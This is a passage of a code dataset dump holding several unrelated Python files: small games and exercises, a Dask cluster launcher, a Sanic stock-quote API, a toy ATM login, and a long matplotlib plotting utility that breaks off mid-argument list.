print(\"Computer wins!\")\n\n # Error message\n else:\n print(\"Error! Invalid input, enter the correct option ...\")\n\n # Ask if the user wants to play again\n play_again = input(\"Do you want to play again [yes, no]? : \")\n if play_again == \"yes\":\n continue\n else:\n print(\"Oops! Wrong command!\")\n if play_again == \"no\":\n break\nprint(\"=====GAME ENDS!====\\nI hope you had a nice time. Good bye!\")\n","repo_name":"Chidozie-c/rock-paper-scissors-task","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1949,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"8179214676","text":"import os\n\nfrom dask.distributed import Client\nimport distributed\n\nfrom Tools.condor_utils import make_htcondor_cluster\n\nfrom dask.distributed import Client, progress\n\ndef getWorkers( client ):\n logs = client.get_worker_logs()\n return list(logs.keys())\n\ndef getAllWarnings( client ):\n logs = client.get_worker_logs()\n workers = getWorkers( client )\n for worker in workers:\n for log in logs[worker]:\n if log[0] == 'WARNING' or log[0] == 'ERROR':\n print ()\n print (\" ### Found warning for worker:\", worker)\n print (log[1])\n\ndef getFilesNotFound( client ):\n allFiles = []\n logs = client.get_worker_logs()\n workers = getWorkers( client )\n for worker in workers:\n for log in logs[worker]:\n if log[0] == 'WARNING':\n print (worker)\n files = [ x for x in log[1].split() if x.count('xrootd') ]\n print ( files )\n allFiles += files\n\n return allFiles\n\ncluster = make_htcondor_cluster(local=False, dashboard_address=13349, disk = \"10GB\", memory = \"5GB\",)\n\nprint (\"Scaling cluster at address %s now.\"%cluster.scheduler_address)\n\ncluster.scale(25)\n\nwith open('scheduler_address.txt', 'w') as f:\n f.write(str(cluster.scheduler_address))\n\nc = Client(cluster)\n","repo_name":"cjmcmahon1/tW_scattering","sub_path":"start_cluster.py","file_name":"start_cluster.py","file_ext":"py","file_size_in_byte":1316,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"31"} +{"seq_id":"14519033660","text":"import random\r\n\r\ngifts = ['skarpeta', 'telefon', 'rękawiczki', 'słuchawki', 'komputer', 'sweter']\r\nmarket = ['telefon', 'słuchawki', 'komputer']\r\nwear_shop = ['skarpeta', 'rękawiczki', 'sweter']\r\n\r\ngift = random.choice(gifts)\r\n\r\nprint(f'Losowym przezentem na dzisiaj jest: {gift}')\r\n\r\nif market.count(gift) > 0:\r\n print(f'{gift} możesz kupić w sklepie z elektroniką.')\r\nelif wear_shop.count(gift) > 0:\r\n print(f'{gift} możesz kupić w sklepie z odzieżą.')\r\nelse:\r\n print('Nie mam dla ciebie rady gdzie szukać tego prezentu..')\r\n","repo_name":"Frycu128/CODE_ME","sub_path":"BASIC/06.5_Christmas_Tree/gift_for_family.py","file_name":"gift_for_family.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"15721754009","text":"from itertools import islice\nfrom sanic import Sanic\nfrom sanic.response import json\nfrom sanic_cors import CORS, cross_origin\nimport requests\nimport asyncio\nimport asyncpg\nimport aiohttp\nfrom modules.models.supportedTimeIntervals import supportedTimeIntervals\nfrom modules.models.stockQuoteData import StockQuoteData\nfrom modules.models.companyStock import CompanyStock\nfrom modules.business import stockQuoteDataBusiness\nfrom modules.utils import config\nfrom modules.persistance import companyPersistence\nfrom marshmallow import Schema, fields, ValidationError, EXCLUDE\nfrom modules.models.companyStockSchema import CompanyStockSchema\nfrom modules.models.companyStockAlphaSchema import CompanyStockAlphaSchema\n\napp = Sanic(__name__)\nCORS(app)\n\n# método para retornar a série da dados do ibovespa no dia atual (intraday)\n# @params: timeInterval : valor de tempo para o intervalo de dados utilizado pela api do alpha vantage\n# @output: stockDataList : um JSON contendo a lista de ações diárias do ibovespa\n@app.route(\"/bvsp-intraday/\", methods=[\"GET\"])\nasync def getBvspIntraDay(request, timeInterval : int):\n try:\n validateTimeIntervalValue(timeInterval)\n except Exception as exceptionMessage:\n return json(\n {\"message\" : str(exceptionMessage)},\n headers={'AlphaVantageAPI-Served-By': 'sanic'},\n status = 406\n )\n\n parameters : str = \"\"\n function : str = \"TIME_SERIES_INTRADAY\" #parâmetro para intraday do alpha vantage\n symbol : str = \"^BVSP\" #símbolo para o Bovespa no alpha vantage\n interval : str = supportedTimeIntervals[timeInterval] #obtém a string reconhecida pela api do alpha vantage\n outputsize : str = \"full\" #série completa\n apiKey : str = config.getApiKey()\n \n #montando url para chamar a api do alpha vantage\n parameters = \"function=\" + function\n parameters += \"&symbol=\" + symbol\n parameters += \"&interval=\" + interval\n parameters += \"&outputsize=\" + outputsize\n parameters += \"&apikey=\" + apiKey\n\n response = requests.get('https://www.alphavantage.co/query?' + parameters)\n jsonResponse : dict = response.json() #em python, ao desserializar o json do response o objeto é do tipo dict\n try:\n metadata, timeStampsData = islice(jsonResponse.values(), 2)#os dados da série estão a partir do segunda valor que corresponde à chave Time Stamps \n stockDataList : list = stockQuoteDataBusiness.convertDictToStockQuoteDataList(timeStampsData)\n stockDataList = stockQuoteDataBusiness.getOnlyLastDailyData(stockDataList)\n return json(\n {\"alpha_vantage_data\" : [stock.toJSON() for stock in stockDataList]}, \n headers={'AlphaVantageAPI-Served-By': 'sanic'},\n status = 200\n )\n except:\n return json(\n {\"message\" : \"Muitas requisições em poco tempo, considere usar uma chave Premium.\"}, \n headers={'AlphaVantageAPI-Served-By': 'sanic'},\n status = 400\n )\n\n# método para retornar a lista das 10 maiores empresas brasileiras salvas em banco\n# @param: nenhum\n# @output: companyList : um JSON contendo a lista das empresas com suas cotações e informações\n# de acordo com os valores salvos no banco \n@app.route(\"/get-top-10\", methods=[\"GET\"])\nasync def getTop10(request):\n try:\n companyList = await companyPersistence.getTop10Companies()\n return json(\n {\"empresas\" : [company.toJSON() for company in companyList]}, \n headers={'AlphaVantageAPI-Served-By': 'sanic'},\n status = 200,\n )\n except Exception as exceptMsg:\n return json(\n {\"erro\" : str(exceptMsg)}, \n headers={'AlphaVantageAPI-Served-By': 'sanic'},\n status = 500,\n )\n\n# método para buscar a cotação de uma empresa dado o seu código reconhecido pela api do Alpha Vantage\n# @params: companySymbol: o símbolo que identifica a empresa para qual se quer a cotação\n# @output: um JSON contendo a cotação da empresa retornada pela api do Alpha Vantage\n@app.route(\"/get-company-stock/\", methods=[\"GET\"])\nasync def getCompanyStock(request, companySymbol : str):\n stockSchema = CompanyStockSchema(only = (\"companySymbol\",))\n try:\n stockSchema.load({\"companySymbol\" : companySymbol})\n except ValidationError as err:\n return json(\n {\"error\": err.messages},\n headers={'AlphaVantageAPI-Served-By':'Sanic'},\n status=406,\n )\n\n parameters : str = \"\"\n function : str = \"GLOBAL_QUOTE\" #parâmetro para cotação de uma empresa pelo alpha vantage\n symbol : str = companySymbol #símbolo da empresa a ser consultada\n apiKey : str = config.getApiKey()\n \n #montando url para chamar a api do alpha vantage\n parameters = \"function=\" + function\n parameters += \"&symbol=\" + symbol\n parameters += \"&apikey=\" + apiKey\n\n response = requests.get('https://www.alphavantage.co/query?' + parameters)\n jsonResponse : dict = response.json() #em python, ao desserializar o json do response o objeto é do tipo dict\n try :\n schema = CompanyStockAlphaSchema()\n res = jsonResponse[\"Global Quote\"]\n stock = schema.load(res, unknown=EXCLUDE)\n return json(\n {\"stock\" : stock.toJSON()},\n headers={'AlphaVantageAPI-Served-By': 'sanic'},\n status = 200\n )\n except Exception as exceptMsg:\n return json(\n {\"erros\": str(exceptMsg)},\n headers={'AlphaVantageAPI-Served-By':'Sanic'},\n status=400\n )\n\n# método para salvar em banco os dados de cotação de uma empresa\n# @param: companyStock : um objeto que modela uma cotação de uma empresa\n# @output: ao final do método, se não houver nada errado a cotação da empresa com código especificado\n# na cotação recebeida terá seu valor salvo/alterado em banco\n@app.route(\"/update-company-stock\", methods=[\"PUT\", \"OPTIONS\"])\nasync def updateCompanyStock(request):\n if(request.method == \"PUT\"):\n try:\n stockSchema = CompanyStockSchema()\n stock = stockSchema.load(request.json)\n await companyPersistence.updateCompanyStock(stock)\n return json(\n {\"message\" : \"Sucesso\"},\n headers={'AlphaVantageAPI-Served-By': 'sanic'},\n status = 200\n )\n except Exception as exceptMsg:\n print(\"Erro ao atualizar cotação da empresa\", str(exceptMsg))\n return json(\n {\"erros\": str(exceptMsg)},\n headers={'AlphaVantageAPI-Served-By':'Sanic'},\n status=400,\n )\n if(request.method != \"OPTIONS\"):\n return json(\n {\"erros\": \"Método não permitido\"},\n headers={'AlphaVantageAPI-Served-By':'Sanic'},\n status=405,\n )\n return json({\"message\" : \"Success\"}, status = 200)\n\n# Método para checar se um determinado valor de intervalo de tempo é válido\ndef validateTimeIntervalValue(value : int):\n if(value not in supportedTimeIntervals):\n raise Exception(\"O valor de intervalo (\" + str(value) + \") é inválido. Apenas os seguintes valores são suportados: \" + str(list(supportedTimeIntervals.keys())) + \".\")\n\n# Método para retornar o objeto referenciado da aplicação para que esta possa ser executada em outro módulo\ndef createApp():\n return app\n\n\n","repo_name":"TiagoSD22/AlphaVantageBVSP","sub_path":"Back-end/modules/api/alphaVantageWrapper.py","file_name":"alphaVantageWrapper.py","file_ext":"py","file_size_in_byte":7459,"program_lang":"python","lang":"pt","doc_type":"code","stars":8,"dataset":"github-code","pt":"31"} +{"seq_id":"42257140651","text":"# -*- coding: utf-8 -*-\n# __author__ = \"LXM\"\n# Date: 2018/4/15 0015\n\n# 主要文件 应该包含入口文件所需的函数\n\nfrom .util import print_red, print_blue, print_green\nfrom .auth import authenticate\nfrom .logger import access_log\nfrom atm import logics\n\nfeatrues = [\n (\"账户信息\", logics.view_account_info),\n (\"取款\", logics.with_draw),\n (\"还款\", logics.repay)\n]\n\n\ndef controller(user_obj):\n while True:\n for index, featrue in enumerate(featrues): # 循环结束后 feature保留最后一个值在作用域中\n print(index, featrue[0])\n print(\"输入exit退出\")\n choice = input(\"请选择序号\")\n if not choice: continue\n if choice.isdigit():\n choice = int(choice)\n print(featrues[choice][1], \"??\")\n if choice < len(featrues) and choice >= 0:\n featrues[choice][1](user_obj)\n if choice == \"exit\":\n exit(\"bye\")\n\n\ndef entrance():\n \"\"\"\n ATM程序交互入口\n :return:\n \"\"\"\n\n user_obj = { # 用户的内存信息 ,每一次操作内存信息都应该同步到数据文件中\n \"is_authenticated\": False,\n \"data\": None\n }\n\n retry_count = 0 # 用户连续登陆失败次数\n while user_obj[\"is_authenticated\"] is not True:\n account = input(\"\\033[1;34m 账号: \\033[0m\").strip()\n password = input(\"\\033[1;34m 密码: \\033[0m\").strip()\n # 需要一个验证账号并返回账号信息的函数 失败返回 None\n auth_data = authenticate(account, password)\n\n if auth_data:\n user_obj[\"is_authenticated\"] = True\n user_obj[\"data\"] = auth_data\n print_green(\"-----欢迎登陆-----\")\n\n # 记录日志\n # create_logger(\"log\")\n access_log.info(\"用户 '%s' 登录成功\" % (user_obj[\"data\"][\"id\"]))\n controller(user_obj)\n else:\n # 没有数据返回说明没有对应的账户信息\n print_red(\"用户名或密码错误,请重新输入\")\n\n retry_count += 1\n\n if retry_count == 3:\n msg = \"用户名或密码错误到达三次,退出程序\"\n print_red(msg)\n break\n","repo_name":"hhy5277/python-","sub_path":"例子/my_ATM(视频思路/atm/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2235,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"37804945862","text":"# Given a non-empty string s and a dictionary wordDict containing a list\n# of non-empty words, determine if s can be segmented into a space-separated\n# sequence of one or more dictionary words.\n# You may assume the dictionary does not contain duplicate words.\n\n# For example, given\n# s = \"leetcode\",\n# dict = [\"leet\", \"code\"].\n\n# Return true because \"leetcode\" can be segmented as \"leet code\".\n\n\n# Interesting TEST cases\n# \"cars\"\n# [\"car\",\"ca\",\"rs\"]\n# [\"c\",\"a\",\"rs\"]\n\n# \"abcd\"\n# [\"a\",\"abc\",\"b\",\"cd\"]\n\n\n#####################################\nclass Solution(object):\n def wordBreak(self, s, wordDict):\n \"\"\"\n :type s: str\n :type wordDict: List[str]\n :rtype: bool\n \"\"\"\n temp_dict = {}\n for word in wordDict:\n \tif word in temp_dict:\n \t\treturn True\n \telse:\n \t\tif s.find(word)!=-1:\n\t \t\ttemp_dict[self._remove_occurances(s,word)] = None\n return \"\" in temp_dict\n\n\n def _remove_occurances(self,s,word):\n while True:\n idx = s.find(word)\n if idx!=-1:\n s = s[0:idx] + s[idx+len(word):]\n if s==\"\" or idx==-1:\n break\n return s\n\n\ndef main():\n\td = {\"a\",\"abc\",\"b\",\"cd\"}\n\ts = \"abcd\"\n\tsol = Solution()\n\tprint(sol.wordBreak(s,d))\n\n\nif __name__ == '__main__':\n\tmain()","repo_name":"msaffarm/InterviewPrep","sub_path":"LeetCode/word_break.py","file_name":"word_break.py","file_ext":"py","file_size_in_byte":1318,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"41960740477","text":"#!/usr/bin/python3\r\n# 2016-12-15 Sergio de la Barrera\r\n# - forked from plotmacdata.py\r\n# - 2017-01-19 added custom delimiter\r\n# - 2017-01-28 fixed column count to ignore whitespace columns created by extra delimiters\r\n# - 2017-01-31 added 'chain' option to allow plotting a series of files chained together in time\r\n# also added vertical option to force subplots to stack vertically\r\n# - 2017-02-02 added horizontal option, like vertical\r\n# also added 'arrows' option to indicate direction of sweeping data\r\n# - 2017-02-03 added glob function to allow expansion of filename wildcards\r\n# modified arrows to take optional argument of arrows length in data points\r\n# - 2017-03-24 added ymult option to scale y-values\r\n# - 2017-03-25 added active ymult to axis label\r\n# added logx option\r\n# - 2017-03-30 added number of rows to stdout\r\n# added interpolation feature for better symmetrization (and plotting limits)\r\n# added boxcar average feature\r\n# - 2017-04-04 added title for (anti)symmetrized panels\r\n# added sharey toggle to use same y-axis range\r\n# - 2017-04-05 added divcol, column to divide data by\r\n# - 2017-04-06 added yshift to allow constant shift of data before other computations\r\n# - 2017-04-08 added option to fold negative x-data into positive axis\r\n# - 2017-04-13 added option to superimpose all data in the same plot\r\n# enabled file/column specific ymult values: f1c1,f1c2;f2c1,f2c2;...\r\n# - 2017-06-01 added manual axis label options\r\n# - 2017-06-08 made legend draggable and moved legend options to rcParams\r\n# - 2017-06-12 allowed for files with differing number of columns (usecols must mutually exist)\r\n# added xlim option for manual axis zooming\r\n# integrated speedy2d colorplotting into speedyplot given two x-columns\r\n# added semicolon specification for different ycolumns from different files: f1y1,f1y2;f2y1f2y2;...\r\n# - 2017-06-13 added semicolon specification for different x-columns from different files: f1y1,f1y2;f2y1f2y2;...\r\n# added save command option to batch file (by pressing 'b' key)\r\n# - 2017-06-26 changed default delimiter value to None, which should still use whitespace unless specified otherwise\r\n# - 2017-06-29 corrected previous change to default delimiter value; now checks list of common delimiters until\r\n# totcols > 1 unless delimiter is explicitly specified; also seeks back to zero for 0 line file headers\r\n# - 2017-11-07 incorporated tight_layout() and font.size, mathtext.default rcParams\r\n# - 2018-01-12 added comma in list of trial delimiters and replaced row number replacement for first column of files with string columns to use np.genfromtxt(),\r\n# replacing the first column but leaving others as np.nan values\r\n# prints number of columns for each file\r\n# removed stripping of digits and underscores from column labels; now only left-strips '#'\r\n# created --list option to print column labels/headers and quit (useful for picking columns to plot)\r\n# - 2018-01-16 added -r option (\"combinecols\") which will perform RMS on two columns to produce magnitude of Re and Im parts of lock-in signal\r\n# also added a basic \"output\" function (mapped to \"o\" key) to save the plotted/manipulated data from the last column of last file\r\n# - 2018-01-26 added ability to invert x- or y-axes (e.g. for estimate of conductance)\r\n# extended yshifts to accept single argument and use that value to separate all curves as n*yshifts\r\n# remapped \"output\" function to \"e\" key (for \"export\") to prevent clash with \"o\" zoom toggle in view window\r\n# - 2018-01-30 fixed ylabel in combinecols mode to print sqrt(x^2 + y^2)\r\n# - 2018-02-07 added waterfall plot mode which shifts ydata by value of second x-axis with optional multiplier\r\n# - 2018-03-22 changed order of divcol and invert so columns are inverted last (allows conversion of V-->R-->conductance)\r\n# added optional argument for --marker which allows specification of marker size for both line and colorplots\r\n# added --square marker option\r\n# created --derivative option (specify columns or perform on all y-columns)\r\n# added --integrate option which uses cumulative trapezoidal summation\r\n# added basic --datetime capability specifically for reading special-measure output (ISO 8601 timestamps)\r\n# - 2018-03-23 implemented file number ranges using bash syntax e.g. {001..021} (zero padding conveys expected width of file numbers)\r\n# - 2018-03-27 extended xhift --> xshifts, allowing semicolon-separated listof shifts for multiple columns/files\r\n# same for xmult\r\n# - 2018-04-04 enabled individual colorplot colorbars with separate automatic scaling for each colorplot\r\n# added colorbar labels to colorplot axes\r\n# improved mode switching (added colorplot_mode, lineplot_mode with to change behavior based on mode throughout)\r\n# fixed labeling system to start with defaults (col 1, col 2, ...), replace with header labels if available, then x, y, c labels for each if provided (using defaults or header labels otherwise)\r\n# added interpolation mode for colorplots\r\n# - 2018-04-05 added ylims option for manual y-axis zooming\r\n# fixed custom label truncation issue by using python list for labels until after manual label replacement\r\n# - 2018-04-09 extended crange to allow semicolon-separated values for different panels\r\n# fixed refresh handling of file_or_glob by moving call to within refresh loop (no longer used as pre-parser for command-line argument input)\r\n# - 2018-04-12 moved zeroy until after applying ymult\r\n# - 2018-04-16 moved raw 2D scatter plot to after main file loop, similar to interpolated plot, in order to obtain better colorscale limits\r\n# - 2018-04-17 added continue statement to skip empty data files; required empty elements to be added to data list and logic for handling those in concatenation\r\n# - 2018-04-26 enabled two-column datetime input, specified by \"-d c1,c2\" where c1 is date column, c2 time (in BlueFors format)\r\n# 2018-07-12 * added --deleterows option which masks selected rows (comma list) with NaN in plotted data\r\n# * added --lw (linewidth) option as well\r\n# 2018-07-13 created --monotonic option which delets elements for which the sweep variable is non-monotonic (e.g. spikes in temperature)\r\n# 2018-08-02 modified order of fold+xnorm to follow xmult+xshifts (used to be reverse; present order allows a shift in fold origin\"\r\n# 2018-08-03 created colorbyorder option to color curves according to colormap\r\n# 2018-08-13 * introduced engineering notation for axis tick labels\r\n# * fixed bug which did not display y-label when using datetime mode\r\n# * changed x-label to 'points' when plotting versus row number\r\n# * added timedelta (-t) plotting option, which operates similarly to datetime (-d) but versus elapsed time instead of absolute time\r\n# * made color iterable\r\n# * added nolegend option to prevent display of legend\r\n# 2018-08-21 * added xboxcar and x2boxcar to allow averaging of x-data (on both axes in colorplots)\r\n#\t\t\t\t* also moved boxcar averaging to occur before interpolation\r\n# 2018-08-29 changed colorplot xdata to a mutable reference instead of a copy; this allows xdata manipulation to propogate to colorplot section\r\n# 2018-09-05 gave colorbyorder an optional argument (cmap reference)\r\n# 2018-09-05 gave line an optional argument (linewidth)\r\n# 2018-09-16 added trimspikes to remove data spikes (2% deviation from rolling average, excluding self)\r\n# 2018-09-16 added traces mode which plots specified linecuts from first x-axis versus the second x-axis\r\n# 2018-09-16 added xdivcol (same functionality as divcol but for x-data)\r\n# 2018-09-16 added ifinlabels option: checks file header for presence of a specific string label and skips file if not present\r\n# 2018-12-11 edited trimspikes to allow multiple columns (comma-separated list)\r\n# 2019-01-06 added even/odd flags to select only even/odd numbers in file ranges specified with {..} notation\r\n# 2019-02-06 added 'orezy' option, which essentially works like zeroy, but uses the max value\r\n# 2019-02-27 changed csints to allow range specification with colon-slices (e.g. colummns 1:9, or rows 100:1001)\r\n# 2019-03-21 added csigma option which sets colorplot crange to a multiple of the z-data standard devation around the mean\r\n# 2020-08-04 added 1-dimensional FFT option\r\n# 2020-08-05 enabled automatic tex-detection of axis labels; inserts $...$ in labels with [{}_^] in string, excluding anything in (...) at end\r\n# added low-pass, high-pass, and band-pass filter options, specified by frequency (scalar for LP/HP, 2-tuple for BP) corresponding to FFT frequency domain\r\n# 2020-08-12 added masknegative option to set negative y-values to NaN (will not plot); NaN may be set to special color for interpolated data\r\n# 2020-08-13 added np.ma.masked_invalid() for colormap plotting in data loop (for correct limits) and plotting loop; also added logz option for colormaps\r\n# added figure size, font size, and dpi options for making nice figures\r\n# 2020-08-14 added x2mult and fixed bug in xmult that applied xmult^p to xdata if more than one y-column was being plotted (one factor for each panel)\r\n# 2020-09-27 added set_visible(False) condition for unused axes in n*m grid\r\n# 2021-02-16 added polynomialsubtract option to subtract an n-degree polynomial fit from each curve\r\n# 2023-02-14 added {start:stop} and {start:step:stop} syntax to options for file range specifiers\r\n# 2023-02-15 fixed logz, which broke due to new matplotlib handling of vmin, vmax in colormaps where normalization is also specified --> limits are not arguments of the normalization\r\n# added centeredz option which uses CenteredNorm()\r\n# added --quiet mode for suppressing file name list and other file-specific details\r\n#\r\n# * add better refresh, autoupdate\r\n# * static panel aspect ratio\r\n# * quit using np array for labels; use list\r\n\r\nimport numpy as np\r\nimport scipy.interpolate as sci\r\nimport scipy.integrate as scg\r\nimport scipy.signal as scs\r\nimport matplotlib as mpl\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib.cm as mcm\r\nfrom matplotlib.ticker import EngFormatter\r\nfrom matplotlib.colors import LinearSegmentedColormap, LogNorm, Normalize, CenteredNorm\r\nimport itertools as it\r\nimport argparse, os, glob, re\r\nimport sys, datetime\r\n\r\ndef csints(string):\r\n if ':' in string:\r\n l = []\r\n for substring in string.split(','):\r\n if ':' in substring:\r\n r1, r2 = map(int, substring.split(':'))\r\n l.extend(range(r1, r2+1))\r\n else:\r\n l.append(int(substring))\r\n else:\r\n l = list(map(int, string.split(',')))\r\n return l\r\n\r\ndef csfloats(string):\r\n return list(map(float, string.split(',')))\r\n\r\ndef ssints(string):\r\n return list(map(csints, string.split(';')))\r\n\r\ndef ssfloats(string):\r\n return list(map(csfloats, string.split(';')))\r\n\r\ndef ssstrs(string):\r\n return list(map(str, string.split(';')))\r\n\r\ndef itstrs(string):\r\n return it.cycle(map(str, string.split(',')))\r\n\r\ndef file_or_glob(string):\r\n if os.path.isfile(string):\r\n fname = string\r\n else:\r\n pattern1 = r'{(\\d+)\\.\\.(\\d+)}'\r\n pattern2 = r'{(\\d+):(\\d+)}'\r\n pattern3 = r'{(\\d+):(\\d+):(\\d+)}'\r\n\r\n match1 = re.search(pattern1, string)\r\n match2 = re.search(pattern2, string)\r\n match3 = re.search(pattern3, string)\r\n\r\n if match1 or match2 or match3: # use file number range\r\n if match1:\r\n match = match1\r\n pattern = pattern1\r\n mstart, mstop = map(int, match.group(1,2))\r\n mstep = 1\r\n fnum_width = max(len(match.group(1)), len(match.group(2)))\r\n elif match2:\r\n match = match2\r\n pattern = pattern2\r\n # mgroup = match.group(1), match.group(2)\r\n mstart, mstop = map(int, match.group(1,2))\r\n mstep = 1\r\n fnum_width = max(len(match.group(1)), len(match.group(2)))\r\n else: # step between file numbers (e.g. {0:4:12} -> 0,4,8,12)\r\n match = match3\r\n pattern = pattern3\r\n # mgroup = match.group(1), match.group(3)\r\n # mstep = match.group(2) \r\n mstart, mstop, mstep = map(int, match.group(1,3,2))\r\n fnum_width = max(len(match.group(1)), len(match.group(3)))\r\n if mstart < mstop+1:\r\n fnum_range = range(mstart, mstop+1, mstep)\r\n else:\r\n fnum_range = range(mstart, mstop-1, -mstep)\r\n repl = '{{:0{}}}'.format(fnum_width)\r\n if args.even:\r\n strings = [re.sub(pattern, repl.format(fnum), string, count=1) for fnum in fnum_range if (fnum+1) % 2]\r\n elif args.odd:\r\n strings = [re.sub(pattern, repl.format(fnum), string, count=1) for fnum in fnum_range if fnum % 2]\r\n else:\r\n strings = [re.sub(pattern, repl.format(fnum), string, count=1) for fnum in fnum_range]\r\n fname = []\r\n for s in strings:\r\n fname.extend(glob.glob(s))\r\n else: # regular glob syntax\r\n fname = glob.glob(string)\r\n return fname\r\n\r\ndef on_key_press(event):\r\n if type(event.key) is str:\r\n if event.key == 'b':\r\n command_args = sys.argv.copy()\r\n command_args[0] = os.path.basename(command_args[0])\r\n batch_fname = os.path.splitext(command_args[0])[0] + '-' + datetime.datetime.now().strftime('%Y-%m-%d-%Hh%Mm%Ss') + '.bat'\r\n with open(batch_fname, 'w') as batch_f:\r\n print(' '.join(command_args), file=batch_f)\r\n print('command saved to --> {}'.format(os.path.join(os.getcwd(), batch_fname)))\r\n elif event.key == 'e':\r\n # saves a tab-delimited ascii file of plotted data\r\n # only makes sense for a single file one column\r\n command_args = sys.argv.copy()\r\n command_args[0] = os.path.basename(command_args[0])\r\n output_fname = os.path.join(os.path.dirname(fname), os.path.splitext(command_args[0])[0] + '-' + datetime.datetime.now().strftime('%Y-%m-%d-%Hh%Mm%Ss') + '-' + os.path.basename(fname))\r\n\r\n output_header = '{:>19}\\t{:>20}'.format(ax.get_xlabel(), ax.get_ylabel())\r\n output = np.column_stack((xdata, col))\r\n np.savetxt(output_fname, output, fmt='%20.12e', delimiter='\\t', newline='\\n', header=output_header, comments='#')\r\n print('saved data to -->', output_fname)\r\n if len(files) > 1 or len(args.usecols[0]) > 1:\r\n print('(only saves final column from last file)')\r\n elif event.key == 'r':\r\n plt.close()\r\n main()\r\n #main(event.canvas.figure)\r\n\r\n# Define input arguments\r\nparser = argparse.ArgumentParser(description='plot somewhat arbitrary data stored in ascii-format column data')\r\n#parser.add_argument('files', nargs='+', type=file_or_glob, help='input files')\r\nparser.add_argument('files', nargs='+', type=str, help='input files')\r\nparser.add_argument('--even', action='store_true', help='select only even number files in range, specified by {n1..n2} notation')\r\nparser.add_argument('--odd', action='store_true', help='select only odd number files in range, specified by {n1..n2} notation')\r\nparser.add_argument('--hysteresis', action='store_true', help='subtract every other curve')\r\nparser.add_argument('--header', type=int, default=1, help='number of header lines to skip', metavar='N')\r\nparser.add_argument('--listcols', action='store_true', help='print list of column headers or labels, if available (first file only)')\r\nparser.add_argument('--quiet', action='store_true', default=False, help='suppress printing file names and other file-specific details')\r\nparser.add_argument('-x', '--plotvs', type=ssints, default=[[0,]], help='column index or indices to plot against (zero-indexed)', metavar='COLS')\r\nparser.add_argument('-y', '--usecols', type=ssints, default=None, help='columns to plot', metavar='COLS')\r\nparser.add_argument('-r', '--combinecols', type=csints, default=None, help='x,y columns --> R = (x**2 + y**2)**0.5', metavar='X,Y')\r\nparser.add_argument('-d', '--datetime', nargs='?', default=False, const=(0,), type=csints, help='column index to interpret as datetime (replaces usual x-axis; combine two cols using comma list)', metavar='COL')\r\nparser.add_argument('-t', '--timedelta', nargs='?', default=False, const=(0,), type=csints, help='column index to interpret as datetime (replaces usual x-axis)', metavar='COL')\r\nparser.add_argument('--ifinlabels', type=str, default=None, help='filter file list based on check for a specific column header', metavar='STR')\r\nparser.add_argument('--crange', type=ssfloats, default=None, help='range of 2D data values (z-axis; can be semicolon list)')\r\nparser.add_argument('--csigma', type=float, default=None, help='multiple of z-axis stddev to use to set color range')\r\nparser.add_argument('--cmap', default=mcm.inferno, help='colormap for 2d plots')\r\nparser.add_argument('--cornplot', action='store_true', help='break up total field into parallel and perp components')\r\nparser.add_argument('--yshift', type=float, default=None, help='constant shift to y-data before other manipulations')\r\nparser.add_argument('--interpolate', type=ssfloats, default=False, metavar='X1,X2,Nx;Y1,Y2,Ny',\r\n help='limits and number of elements to interpolate with respect to plotting axis; single value uses data limits')\r\nparser.add_argument('--boxcar', type=int, default=False, help='perform boxcar average over N neighbors', metavar='N')\r\nparser.add_argument('--xboxcar', type=int, default=False, help='perform boxcar average on x-data over N neighbors', metavar='N')\r\nparser.add_argument('--x2boxcar', type=int, default=False, help='perform boxcar average on second x-axis of colorplot over N neighbors', metavar='N')\r\nparser.add_argument('--lorentz', type=int, default=False, help='perform lorentzian blur over N neighbors', metavar='N')\r\nparser.add_argument('--symmetrize', type=csints, default=[], metavar='COLS',\r\n help='columns to symmetrize; requires rows to be symmetric about zero and equally spaced')\r\nparser.add_argument('--antisymmetrize', type=csints, default=[], metavar='COLS',\r\n help='columns to antisymmetrize; requires rows to be symmetric about zero and equally spaced')\r\nparser.add_argument('--chain', action='store_true', help='chain time series plots together from multiple files')\r\nparser.add_argument('--line', nargs='?', type=float, default=1, const=True, help='plot solid lines (may also give linewidth)')\r\n#parser.add_argument('--marker', action='store_true', help='plot using point markers')\r\nparser.add_argument('--marker', nargs='?', default=False, const=True, type=int, help='plot using point markers (can take number argument which changes colorplot marker size; default s=200)')\r\nparser.add_argument('--square', action='store_true', help='plot using square markers')\r\n#parser.add_argument('--arrows', action='store_true', help='add arrows to indicate sweep direction')\r\nparser.add_argument('--arrows', nargs='?', default=False, const=1, type=int,\r\n help='add arrows to indicate sweep direction')\r\nparser.add_argument('--dashes', action='store_true', help='use dashes to indicate negative sweep direction')\r\nparser.add_argument('--fold', action='store_true', help='fold negative x-values into positive axis')\r\nparser.add_argument('--logx', action='store_true', help='use log scale on x-axis')\r\nparser.add_argument('--logy', action='store_true', help='use log scale on y-axis')\r\nparser.add_argument('--logz', action='store_true', help='use log scale on z-axis (color scale)')\r\nparser.add_argument('--centeredz', action='store_true', help='use a centered normalized scale on z-axis (color scale)')\r\nparser.add_argument('--xmult', type=ssfloats, default=None, help='multiplier to scale x-axes (can be list)')\r\nparser.add_argument('--x2mult', type=ssfloats, default=None, help='multiplier to scale second x-axes in colorplot mode')\r\nparser.add_argument('--xshifts', type=ssfloats, default=None, help='offset to shift x-axes (can be list; will cycle if fewer than number of files)')\r\nparser.add_argument('--xinvert', action='store_true', help='invert x-axis')\r\nparser.add_argument('--xlabel', type=str, default=None, help='manually specify x-axis label (string)')\r\nparser.add_argument('--ylabels', type=ssstrs, default=None, help='manually specify y-axis labels (string; semicolons for multiple axes)')\r\nparser.add_argument('--clabels', type=ssstrs, default=None, help='manually specify c-axis labels for colorplots (string; semicolons for multiple axes)')\r\nparser.add_argument('--divcol', type=int, default=None, help='divide all columns by the data in this column', metavar='COL')\r\nparser.add_argument('--xdivcol', type=int, default=None, help='divide x-column by the data in this column', metavar='COL')\r\nparser.add_argument('--normy', action='store_true', help='normalize 